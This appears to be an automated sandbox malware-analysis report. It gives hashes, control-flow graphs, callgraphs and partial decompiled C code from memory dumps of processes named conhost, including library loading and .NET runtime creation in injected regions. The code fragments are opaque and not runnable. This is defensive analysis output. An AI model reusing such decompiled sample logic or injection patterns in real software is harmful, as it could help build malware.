                                          • Instruction Fuzzy Hash: DB31A13130CA184FDF58EA58984A3A9B3D2F7D8721F050299DC0FE72C9EE61DD428792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C071BC Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 690 7ff9f1c071bc-7ff9f1c071c3 691 7ff9f1c071c5-7ff9f1c071cd 690->691 692 7ff9f1c071ce-7ff9f1c07262 FindCloseChangeNotification 690->692 691->692 695 7ff9f1c07264 692->695 696 7ff9f1c0726a-7ff9f1c07291 692->696 695->696
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.676849181.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID: ChangeCloseFindNotification
                                          • String ID:
                                          • API String ID: 2591292051-0
                                          • Opcode ID: 1010de40233fd454aa96faf2e0694d4c251615cbab1514dd018ea45a15c87557
                                          • Instruction ID: 96166ba77e5b9937be173a704efe719e1d73f6a85de794027329d239fb2410af
                                          • Opcode Fuzzy Hash: 1010de40233fd454aa96faf2e0694d4c251615cbab1514dd018ea45a15c87557
                                          • Instruction Fuzzy Hash: 8131C23090CA4C9FDB59DB688805BF9BBF0FB56321F14426FD089D31A2DB64A856CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0000027E764F82A2 Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000018.00000002.662884382.0000027E76320000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000027E76320000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_24_2_27e76320000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction ID: 055e23c8c5ef004067ebd5881b4ad1a4509a11b98612a180a6ff22238d26ca30
                                          • Opcode Fuzzy Hash: 18f38e2fc847854b46ad59a886f9863d7abffa86fceba1a0e453a632ae2104e0
                                          • Instruction Fuzzy Hash: BAE0D83120CA0D1FFB58D69DD84A7F6A6D8E799276F04006EE549D2141F156989103A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:33.9%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:15
                                          Total number of Limit Nodes:0
                                          execution_graph 242 401ce2 243 401d2a 242->243 244 4010c4 _get_pgmptr 243->244 245 401d63 244->245 228 401bea 229 401c1c 228->229 232 401b3f 229->232 231 401cd5 233 401b75 232->233 236 4010c4 233->236 235 401bae 235->231 237 4010e7 236->237 240 401d80 _get_pgmptr 237->240 239 40114a 239->235 241 40857c 240->241

                                          Callgraph

                                          Executed Functions

                                          Function 004010C4 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 37%
                                          			E004010C4(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				void* _v32;
				char _v136;
				void* _v144;
				char _v152;
				char _v160;
				char _v680;
				void* _v1200;
				void* _v1208;
				char _v1468;
				long long _v1480;
				long long _v1496;
				long long _v1504;
				long long _v1512;
				long long _v1520;
				long long _v1528;
				long long _v1536;
				long long _v1544;
				long long _t94;
				long long _t104;

				_a8 = __rcx;
				_a16 = __rdx;
				L00401D70(); // executed
				L00401D78();
				_v136 = 0x68;
				_v144 = 0;
				_v152 = 0x64d4;
				E00401D80();
				L00401D88();
				E00401000(0x402021,  &_v1468);
				_v1480 = 0x402021;
				E00401000(0x402027, 0x402021);
				L00401D90();
				E00401000(0x40203c,  &_v680);
				L00401D90();
				_v1504 =  &_v32;
				_v1512 =  &_v136;
				_v1520 = 0;
				_v1528 = 0;
				_v1536 = 0;
				_v1544 = 0;
				_t94 =  &_v680;
				L00401D98(); // executed
				_v1536 = _t94;
				_v1544 = _t94;
				E004019C6(_v32,  &_v144,  &_v152,  &_v152);
				E00401000(0x402051, _v32);
				_v1544 = 0;
				E00401986(_v32, _v144, 0x402051, 0x64d4); // executed
				_v1544 = 0;
				_t104 = _v32;
				E00401A06(_t104,  &_v144,  &_v152, 0);
				_v1496 = _t104;
				_v1504 = 0;
				_v1512 = 0;
				_v1520 = 0;
				_v1528 = 0;
				_v1536 = 0;
				_v1544 = _v144;
				E00401946( &_v160, _v32, _v32, _v32); // executed
				return 0;
			}






















                                          0x004010cf
                                          0x004010d3
                                          0x004010e2
                                          0x00401109
                                          0x00401113
                                          0x00401120
                                          0x00401131
                                          0x00401145
                                          0x00401162
                                          0x0040117f
                                          0x00401196
                                          0x004011a3
                                          0x004011cf
                                          0x004011ec
                                          0x00401218
                                          0x00401221
                                          0x0040122a
                                          0x00401239
                                          0x00401248
                                          0x00401252
                                          0x0040125c
                                          0x00401285
                                          0x00401295
                                          0x0040129f
                                          0x004012a9
                                          0x004012d7
                                          0x004012f4
                                          0x00401303
                                          0x0040132f
                                          0x0040133e
                                          0x0040135f
                                          0x0040136c
                                          0x00401376
                                          0x00401385
                                          0x00401394
                                          0x004013a3
                                          0x004013ad
                                          0x004013bc
                                          0x004013c8
                                          0x004013f4
                                          0x004013ff

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000025.00000002.654126876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_37_2_400000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ossgiopsxz
                                          • API String ID: 0-950112196
                                          • Opcode ID: 027129236f5fc17bb930072bc991c7d93042750dbe684d2a69f9bce0d8af0eb9
                                          • Instruction ID: 2fac3ab3631056accbe24265960f0be9d3d1f2f5858e293367a5fffc7fc83569
                                          • Opcode Fuzzy Hash: 027129236f5fc17bb930072bc991c7d93042750dbe684d2a69f9bce0d8af0eb9
                                          • Instruction Fuzzy Hash: AB613C61702B504DEB508B27DC513DA77A8F749BC8F404176AE8CAB799EE3DCA44C744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401BEA Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 53%
                                          			_entry_() {
				char _v12;
				long long _v24;
				long long _v40;
				void* _t15;
				void* _t16;

				L00401D78();
				L00401DA8();
				L00401DB0();
				L00401DB8();
				_v24 = __imp____argc;
				_v40 =  &_v12;
				L00401DC0();
				_v24 = __imp____argc;
				_t15 = E00401B3F(_t16, _v24,  *__imp____argv,  *__imp___environ,  &_v12); // executed
				L00401DC8(); // executed
				return _t15;
			}








                                          0x00401c17
                                          0x00401c29
                                          0x00401c39
                                          0x00401c54
                                          0x00401c6e
                                          0x00401c76
                                          0x00401c97
                                          0x00401cb1
                                          0x00401cd0
                                          0x00401cdb
                                          0x00401ce1

                                          Memory Dump Source
                                          • Source File: 00000025.00000002.654126876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_37_2_400000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21ce4a3c4bad2d8f52745ea6da2cc4f672f971df28c2dac7a61d08be2758dfbf
                                          • Instruction ID: f95b0866ce9a4e8d08972c4a78e499f77477d906ef96c5bed7f61ccbfb91fcdc
                                          • Opcode Fuzzy Hash: 21ce4a3c4bad2d8f52745ea6da2cc4f672f971df28c2dac7a61d08be2758dfbf
                                          • Instruction Fuzzy Hash: BE21ECA4301A1498EB80DB57DD5179923A4BB4DFC8F804937AF4DB7365EE7CD9019348
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401B3F Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 46 401b3f-401bba call 401a48 call 4010c4 call 401adc
                                          C-Code - Quality: 43%
                                          			E00401B3F(void* __ecx, long long __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v12;
				long long _v24;
				intOrPtr _t14;

				_a8 = __rcx;
				_a16 = __rdx;
				_a24 = __r8;
				E00401A48(_a16, _a16, _a24);
				_v24 = __imp____argc;
				_t14 = E004010C4(_v24, _v24,  *__imp____argv); // executed
				_v12 = _t14;
				E00401ADC();
				return _v12;
			}






                                          0x00401b4a
                                          0x00401b4e
                                          0x00401b52
                                          0x00401b70
                                          0x00401b8a
                                          0x00401ba9
                                          0x00401bae
                                          0x00401bb1
                                          0x00401bba

                                          Memory Dump Source
                                          • Source File: 00000025.00000002.654126876.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_37_2_400000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 71c76325ed0e7fe3de239db9d8a5e5db3261d91b9ad74311023916eb60203952
                                          • Instruction ID: 7879c93a9b15af3785b8632dd2cf68d13165e66144cc5e65a5fd7a9e35596cc3
                                          • Opcode Fuzzy Hash: 71c76325ed0e7fe3de239db9d8a5e5db3261d91b9ad74311023916eb60203952
                                          • Instruction Fuzzy Hash: A801A4B6702B488DDB40DF66DC8139837A4F348BC8F40482AAF4CA7B69DA38C5118744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:15.3%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:0%
                                          Total number of Nodes:19
                                          Total number of Limit Nodes:2
                                          execution_graph 2062 286977b3eaf LoadLibraryA 2063 286977b3ec7 2062->2063 2064 286977b4d06 2065 286977b4d28 2064->2065 2066 286977b4e54 LoadLibraryA 2065->2066 2067 286977b4d7c 2065->2067 2068 286977b4e69 2065->2068 2066->2065 2068->2067 2075 286977b4f1d 2068->2075 2081 286977b3ea2 2068->2081 2070 286977b4ef3 2071 286977b4ef7 2070->2071 2076 286977b3fba LoadLibraryA 2070->2076 2071->2067 2071->2070 2074 286977b4f0c 2074->2067 2074->2075 2075->2067 2078 286977b4ab2 2075->2078 2077 286977b3fdf 2076->2077 2077->2074 2079 286977b4af2 CLRCreateInstance 2078->2079 2080 286977b4b0b 2078->2080 2079->2080 2080->2067 2082 286977b3eaf LoadLibraryA 2081->2082 2083 286977b3ec7 2082->2083 2083->2070

                                          Callgraph

                                          • Executed
                                          • Not Executed
                                          • Opacity -> Relevance
                                          • Disassembly available
                                          callgraph 0 Function_00000286977B003D 1 Function_00007FF9F1C03899 2 Function_00007FF9F1C02CB8 3 Function_00000286977B462E 4 Function_00007FF9F1C034B2 5 Function_00007FF9F1C007B0 6 Function_00007FF9F1C030AD 7 Function_00000286977B6426 8 Function_00007FF9F1C002AA 26 Function_00007FF9F1C00088 8->26 9 Function_00007FF9F1C036C8 10 Function_00007FF9F1C019C6 11 Function_00000286977B601E 12 Function_00000286977B4922 13 Function_00007FF9F1C03FD8 14 Function_00007FF9F1C03AD5 15 Function_00000286977B550E 38 Function_00000286977B49D2 15->38 68 Function_00000286977B649A 15->68 83 Function_00000286977B647E 15->83 96 Function_00000286977B5C66 15->96 102 Function_00000286977B645E 15->102 16 Function_00000286977B4D06 16->15 28 Function_00000286977B5EDE 16->28 29 Function_00000286977B61E2 16->29 32 Function_00000286977B50D6 16->32 37 Function_00000286977B40D2 16->37 51 Function_00000286977B3FBA 16->51 57 Function_00000286977B4AB2 16->57 64 Function_00000286977B3EA2 16->64 78 Function_00000286977B6092 16->78 16->83 100 Function_00000286977B596A 16->100 16->102 108 Function_00000286977B4552 16->108 109 Function_00000286977B5F52 16->109 17 Function_00000286977B460C 18 Function_00007FF9F1C010C9 19 Function_00007FF9F1C02B68 19->2 20 Function_00007FF9F1C01065 21 Function_00007FF9F1C00561 22 Function_00007FF9F1C01C5D 23 Function_00007FF9F1C05770 24 Function_00007FF9F1C0166E 65 Function_00007FF9F1C0193E 24->65 25 Function_00007FF9F1C0306B 27 Function_00007FF9F1C02586 82 Function_00000286977B438A 28->82 29->7 30 Function_00007FF9F1C00580 31 Function_00007FF9F1C00080 33 Function_00007FF9F1C00098 33->26 34 Function_00007FF9F1C00095 34->26 35 Function_00007FF9F1C01095 36 Function_00000286977B46D2 37->78 37->83 37->109 38->68 39 Function_00000286977B5ED2 40 Function_00007FF9F1C00090 41 Function_00000286977B5ECA 42 Function_00007FF9F1C01328 85 Function_00007FF9F1C015E3 42->85 43 Function_00007FF9F1C03B26 88 Function_00007FF9F1C03CE2 43->88 44 Function_00000286977B49BE 45 Function_00000286977B5EBE 46 Function_00007FF9F1C00722 46->5 92 Function_00007FF9F1C007F5 46->92 47 Function_00007FF9F1C01021 48 Function_00007FF9F1C00520 48->40 49 Function_00007FF9F1C02E20 50 Function_00007FF9F1C00919 50->30 50->33 50->47 50->48 89 Function_00007FF9F1C00FDD 50->89 51->102 52 Function_00007FF9F1C04536 94 Function_00007FF9F1C049F4 52->94 53 Function_00000286977B3EAF 53->102 54 Function_00007FF9F1C02935 55 Function_00007FF9F1C03D35 56 Function_00007FF9F1C05235 58 Function_00000286977B49B2 59 Function_00007FF9F1C0222D 60 Function_00007FF9F1C01E2C 111 Function_00007FF9F1C0200E 60->111 61 Function_00007FF9F1C01B29 62 Function_00007FF9F1C02A44 63 Function_00007FF9F1C00842 63->30 63->31 64->102 66 Function_00007FF9F1C0333D 66->4 67 Function_00007FF9F1C04039 76 Function_00007FF9F1C04451 67->76 69 Function_00007FF9F1C05856 70 Function_00000286977B008F 71 Function_00007FF9F1C01D54 72 Function_00007FF9F1C03E54 72->13 73 Function_00007FF9F1C05954 74 Function_00000286977B0193 75 Function_00007FF9F1C02051 98 Function_00007FF9F1C021E9 75->98 77 Function_00000286977B4992 79 Function_00007FF9F1C02350 79->27 80 Function_00007FF9F1C04E4C 81 Function_00000286977B018B 82->109 84 Function_00000286977B467E 86 Function_00007FF9F1C028E3 87 Function_00007FF9F1C052E2 87->23 90 Function_00007FF9F1C038DD 90->14 91 Function_00007FF9F1C04EF6 91->56 93 Function_00007FF9F1C034F5 93->9 95 Function_00007FF9F1C008F0 96->102 103 Function_00000286977B4A5E 96->103 97 Function_00007FF9F1C025EA 99 Function_00000286977B466A 100->36 100->83 101 Function_00007FF9F1C01208 104 Function_00000286977B0058 105 Function_00007FF9F1C02CFD 106 Function_00007FF9F1C026FC 106->86 107 Function_00007FF9F1C03215 109->11 109->83 110 Function_00007FF9F1C02F10 110->25 112 Function_00007FF9F1C04B0E 112->80 113 Function_00007FF9F1C0050D 113->40 114 Function_00007FF9F1C0370D 114->1

                                          Executed Functions

                                          Function 00000286977B4D06 Relevance: 1.9, APIs: 1, Instructions: 378libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 142 286977b4d06-286977b4d57 call 286977b5ede * 3 149 286977b4d89 142->149 150 286977b4d59-286977b4d5c 142->150 151 286977b4d8c-286977b4d9d 149->151 150->149 152 286977b4d5e-286977b4d61 150->152 152->149 153 286977b4d63-286977b4d7a 152->153 155 286977b4d9e-286977b4dc9 call 286977b645e call 286977b647e 153->155 156 286977b4d7c-286977b4d83 153->156 162 286977b4e06-286977b4e1d call 286977b5ede 155->162 163 286977b4dcb-286977b4e00 call 286977b6092 call 286977b5f52 155->163 156->149 157 286977b4d85 156->157 157->149 162->149 168 286977b4e23-286977b4e24 162->168 163->162 172 286977b5062-286977b5073 163->172 170 286977b4e2a-286977b4e30 168->170 173 286977b4e32 170->173 174 286977b4e69-286977b4e73 170->174 175 286977b5075-286977b507f 172->175 176 286977b50a6-286977b50c7 call 286977b647e 172->176 177 286977b4e34-286977b4e36 173->177 178 286977b4ea1-286977b4eaa 174->178 179 286977b4e75-286977b4e90 call 286977b5ede 174->179 175->176 182 286977b5081-286977b509f call 286977b647e 175->182 207 286977b50c9 176->207 208 286977b50cd-286977b50cf 176->208 183 286977b4e50-286977b4e52 177->183 184 286977b4e38-286977b4e3e 177->184 180 286977b4ec5-286977b4ec8 178->180 181 286977b4eac-286977b4eb6 call 286977b40d2 178->181 179->172 198 286977b4e96-286977b4e9f 179->198 180->172 188 286977b4ece-286977b4ed8 180->188 181->172 199 286977b4ebc-286977b4ec3 181->199 182->176 183->174 191 286977b4e54-286977b4e67 LoadLibraryA 183->191 184->183 190 286977b4e40-286977b4e4e 184->190 195 286977b4ee2-286977b4ee9 188->195 196 286977b4eda-286977b4edb 188->196 190->177 190->183 191->170 200 286977b4f1d-286977b4f21 195->200 201 286977b4eeb-286977b4eec 195->201 196->195 198->178 198->179 199->195 203 286977b4f27-286977b4f49 200->203 204 286977b4ffd-286977b5005 200->204 206 286977b4eee call 286977b3ea2 201->206 203->172 218 286977b4f4f-286977b4f69 call 286977b645e 203->218 209 286977b5057-286977b505d call 286977b550e 204->209 210 286977b5007-286977b500d 204->210 211 286977b4ef3-286977b4ef5 206->211 207->208 208->151 209->172 214 286977b500f-286977b5015 210->214 215 286977b5024-286977b5036 call 286977b4ab2 210->215 216 286977b4f04-286977b4f07 call 286977b3fba 211->216 217 286977b4ef7-286977b4efe 211->217 214->172 219 286977b5017-286977b5022 call 286977b596a 214->219 229 286977b5048-286977b5055 call 286977b4552 215->229 230 286977b5038-286977b5043 call 286977b50d6 215->230 225 286977b4f0c-286977b4f0e 216->225 217->172 217->216 231 286977b4f89-286977b4fb2 218->231 232 286977b4f6b-286977b4f6e 218->232 219->172 225->200 226 286977b4f10-286977b4f17 225->226 226->172 226->200 229->172 230->229 231->172 240 286977b4fb8-286977b4ff8 231->240 232->204 236 286977b4f74-286977b4f87 call 286977b61e2 232->236 241 286977b4ffa-286977b4ffb 236->241 240->172 240->241 241->204
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.695316719.00000286977B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000286977B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_286977b0000_conhost.jbxd
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                          • Instruction ID: 41c754a9c32c8205600ff4d15a87c64926426ae7a4d3f4453598986d4024dd47
                                          • Opcode Fuzzy Hash: e85963f26a05e09d368196b1c7f413e753b92ff7721d7fdd34470331445b4a6a
                                          • Instruction Fuzzy Hash: DCC154343179055BEB99EE28849DBB9B3D1FB98300F548669D54ACB1C6DF30F8528B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C04536 Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 346 7ff9f1c04536-7ff9f1c04543 347 7ff9f1c04545-7ff9f1c0454d 346->347 348 7ff9f1c0454e-7ff9f1c04617 346->348 347->348 351 7ff9f1c04683 348->351 352 7ff9f1c04619-7ff9f1c04622 348->352 353 7ff9f1c04685-7ff9f1c046aa 351->353 352->351 354 7ff9f1c04624-7ff9f1c04630 352->354 361 7ff9f1c04716 353->361 362 7ff9f1c046ac-7ff9f1c046b5 353->362 355 7ff9f1c04632-7ff9f1c04644 354->355 356 7ff9f1c04669-7ff9f1c04681 354->356 358 7ff9f1c04648-7ff9f1c0465b 355->358 359 7ff9f1c04646 355->359 356->353 358->358 360 7ff9f1c0465d-7ff9f1c04665 358->360 359->358 360->356 364 7ff9f1c04718-7ff9f1c047c0 361->364 362->361 363 7ff9f1c046b7-7ff9f1c046c3 362->363 365 7ff9f1c046c5-7ff9f1c046d7 363->365 366 7ff9f1c046fc-7ff9f1c04714 363->366 375 7ff9f1c047c2-7ff9f1c047db 364->375 376 7ff9f1c0482e 364->376 368 7ff9f1c046db-7ff9f1c046ee 365->368 369 7ff9f1c046d9 365->369 366->364 368->368 371 7ff9f1c046f0-7ff9f1c046f8 368->371 369->368 371->366 377 7ff9f1c04814-7ff9f1c0482c 375->377 378 7ff9f1c047dd-7ff9f1c047ef 375->378 379 7ff9f1c04830-7ff9f1c04859 376->379 377->379 380 7ff9f1c047f3-7ff9f1c04806 378->380 381 7ff9f1c047f1 378->381 384 7ff9f1c048c3 379->384 385 7ff9f1c0485b-7ff9f1c04866 379->385 380->380 383 7ff9f1c04808-7ff9f1c04810 380->383 381->380 383->377 387 7ff9f1c048c5-7ff9f1c04958 384->387 385->384 386 7ff9f1c04868-7ff9f1c04876 385->386 388 7ff9f1c04878-7ff9f1c0488a 386->388 389 7ff9f1c048af-7ff9f1c048c1 386->389 395 7ff9f1c0495c-7ff9f1c0496b 387->395 390 7ff9f1c0488e-7ff9f1c048a1 388->390 391 7ff9f1c0488c 388->391 389->387 390->390 393 7ff9f1c048a3-7ff9f1c048ab 390->393 391->390 393->389 396 7ff9f1c04973-7ff9f1c049d8 call 7ff9f1c049f4 395->396 397 7ff9f1c0496d 395->397 404 7ff9f1c049df-7ff9f1c049f3 396->404 405 7ff9f1c049da 396->405 397->396 405->404
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8eAS
                                          • API String ID: 0-1103591571
                                          • Opcode ID: e7e34c076a78561ddf6fab2ef219859410a3e6ea3e4b32e7874722e895b7c5e0
                                          • Instruction ID: 86a5de8d0fefb09ff02447c4a65f4a44c10e911b0676ef9460e4769642f158f8
                                          • Opcode Fuzzy Hash: e7e34c076a78561ddf6fab2ef219859410a3e6ea3e4b32e7874722e895b7c5e0
                                          • Instruction Fuzzy Hash: 90F1C430508A8D8FEBA8DF28C8457FA37E1FF55310F14426EE84DC7295DB74A9818B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C052E2 Relevance: 1.7, Strings: 1, Instructions: 462COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 406 7ff9f1c052e2-7ff9f1c052ef 407 7ff9f1c052f1-7ff9f1c052f9 406->407 408 7ff9f1c052fa-7ff9f1c053c7 406->408 407->408 411 7ff9f1c05433 408->411 412 7ff9f1c053c9-7ff9f1c053d2 408->412 414 7ff9f1c05435-7ff9f1c0545a 411->414 412->411 413 7ff9f1c053d4-7ff9f1c053e0 412->413 415 7ff9f1c053e2-7ff9f1c053f4 413->415 416 7ff9f1c05419-7ff9f1c05431 413->416 421 7ff9f1c054c6 414->421 422 7ff9f1c0545c-7ff9f1c05465 414->422 417 7ff9f1c053f8-7ff9f1c0540b 415->417 418 7ff9f1c053f6 415->418 416->414 417->417 420 7ff9f1c0540d-7ff9f1c05415 417->420 418->417 420->416 423 7ff9f1c054c8-7ff9f1c054ed 421->423 422->421 424 7ff9f1c05467-7ff9f1c05473 422->424 431 7ff9f1c054ef-7ff9f1c05508 423->431 432 7ff9f1c0555b 423->432 425 7ff9f1c05475-7ff9f1c05487 424->425 426 7ff9f1c054ac-7ff9f1c054c4 424->426 427 7ff9f1c0548b-7ff9f1c0549e 425->427 428 7ff9f1c05489 425->428 426->423 427->427 430 7ff9f1c054a0-7ff9f1c054a8 427->430 428->427 430->426 434 7ff9f1c05541-7ff9f1c05559 431->434 435 7ff9f1c0550a-7ff9f1c0551c 431->435 433 7ff9f1c0555d-7ff9f1c0558b 432->433 440 7ff9f1c0558d-7ff9f1c05598 433->440 441 7ff9f1c055fb 433->441 434->433 436 7ff9f1c05520-7ff9f1c05533 435->436 437 7ff9f1c0551e 435->437 436->436 439 7ff9f1c05535-7ff9f1c0553d 436->439 437->436 439->434 440->441 442 7ff9f1c0559a-7ff9f1c055a8 440->442 443 7ff9f1c055fd-7ff9f1c056d7 441->443 444 7ff9f1c055e1-7ff9f1c055f9 442->444 445 7ff9f1c055aa-7ff9f1c055bc 442->445 453 7ff9f1c056db-7ff9f1c056ea 443->453 444->443 446 7ff9f1c055c0-7ff9f1c055d3 445->446 447 7ff9f1c055be 445->447 446->446 449 7ff9f1c055d5-7ff9f1c055dd 446->449 447->446 449->444 454 7ff9f1c056f2-7ff9f1c05754 call 7ff9f1c05770 453->454 455 7ff9f1c056ec 453->455 462 7ff9f1c05756 454->462 463 7ff9f1c0575b-7ff9f1c0576f 454->463 455->454 462->463
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8eAS
                                          • API String ID: 0-1103591571
                                          • Opcode ID: c517e0d6a2280677bbbf00cd7f816aad8409ec4b26bc4015cc9169dc4115f8c1
                                          • Instruction ID: b03f10d5f1141289ae23d16eb39135cf86b8763d2f2033cb5ac37ec8903905f4
                                          • Opcode Fuzzy Hash: c517e0d6a2280677bbbf00cd7f816aad8409ec4b26bc4015cc9169dc4115f8c1
                                          • Instruction Fuzzy Hash: 8CE1B430508A8D8FEBA9DF28C8557F93BE1FF55311F14426ED84DC72A1DB74A8858B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00007FF9F1C00919 Relevance: 2.0, Strings: 1, Instructions: 702COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 7ff9f1c00919-7ff9f1c00962 2 7ff9f1c00965-7ff9f1c00994 0->2 5 7ff9f1c00996-7ff9f1c0099e 2->5 6 7ff9f1c009a5-7ff9f1c009b0 2->6 5->6 8 7ff9f1c009b2-7ff9f1c009cc call 7ff9f1c00520 6->8 9 7ff9f1c009cd-7ff9f1c009e1 6->9 8->9 12 7ff9f1c009e3-7ff9f1c009e7 9->12 13 7ff9f1c00a00-7ff9f1c00a8c call 7ff9f1c00520 9->13 12->13 15 7ff9f1c009e9-7ff9f1c009ed 12->15 28 7ff9f1c00a92-7ff9f1c00aa4 13->28 29 7ff9f1c00b7f-7ff9f1c00bc2 call 7ff9f1c00fdd call 7ff9f1c00520 13->29 17 7ff9f1c009f4-7ff9f1c009f9 15->17 17->13 34 7ff9f1c00aa6-7ff9f1c00ab3 28->34 35 7ff9f1c00abd-7ff9f1c00b79 28->35 42 7ff9f1c00bc4-7ff9f1c00bfd call 7ff9f1c00520 29->42 43 7ff9f1c00bff 29->43 34->35 39 7ff9f1c00ab5-7ff9f1c00abb 34->39 35->28 35->29 39->35 45 7ff9f1c00c04-7ff9f1c00c8e call 7ff9f1c00520 42->45 43->45 66 7ff9f1c00c94-7ff9f1c00ca6 45->66 67 7ff9f1c00d7f-7ff9f1c00df6 call 7ff9f1c01021 45->67 73 7ff9f1c00ca8-7ff9f1c00cb5 66->73 74 7ff9f1c00cbf-7ff9f1c00cc2 66->74 93 7ff9f1c00df8-7ff9f1c00e05 67->93 73->74 79 7ff9f1c00cb7-7ff9f1c00cbd 73->79 76 7ff9f1c00cc8-7ff9f1c00ce0 74->76 77 7ff9f1c00d6e-7ff9f1c00d79 74->77 76->77 84 7ff9f1c00ce6-7ff9f1c00d3b call 7ff9f1c00520 76->84 77->66 77->67 79->74 84->77 97 7ff9f1c00d3d-7ff9f1c00d6b 84->97 95 7ff9f1c00ea2 93->95 96 7ff9f1c00e0b-7ff9f1c00e3c call 7ff9f1c00520 93->96 100 7ff9f1c00ea7 95->100 105 7ff9f1c00e95-7ff9f1c00e9a 96->105 106 7ff9f1c00e3e-7ff9f1c00e43 96->106 97->77 102 7ff9f1c00eac-7ff9f1c00ec5 100->102 110 7ff9f1c00ec7-7ff9f1c00ec9 102->110 111 7ff9f1c00ecf-7ff9f1c00ee8 102->111 105->93 108 7ff9f1c00ea0 105->108 106->95 109 7ff9f1c00e45-7ff9f1c00e68 call 7ff9f1c00520 106->109 108->102 109->100 124 7ff9f1c00e6a-7ff9f1c00e8d call 7ff9f1c00520 109->124 110->111 114 7ff9f1c00fce-7ff9f1c00fd8 110->114 118 7ff9f1c00ef7-7ff9f1c00fc6 call 7ff9f1c00520 * 2 call 7ff9f1c00098 call 7ff9f1c00580 111->118 119 7ff9f1c00eea-7ff9f1c00ef1 111->119 114->2 118->114 119->118 122 7ff9f1c00fc8 119->122 122->114 124->105 132 7ff9f1c00e8f-7ff9f1c00e93 124->132 132->100 132->105
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000029.00000002.702660848.00007FF9F1C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9F1C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_41_2_7ff9f1c00000_conhost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HAS
                                          • API String ID: 0-1809462313
                                          • Opcode ID: 2e047e9e8caa7f93d72262577d5b56afd29b01a3bd38d28755385d955b6ad381
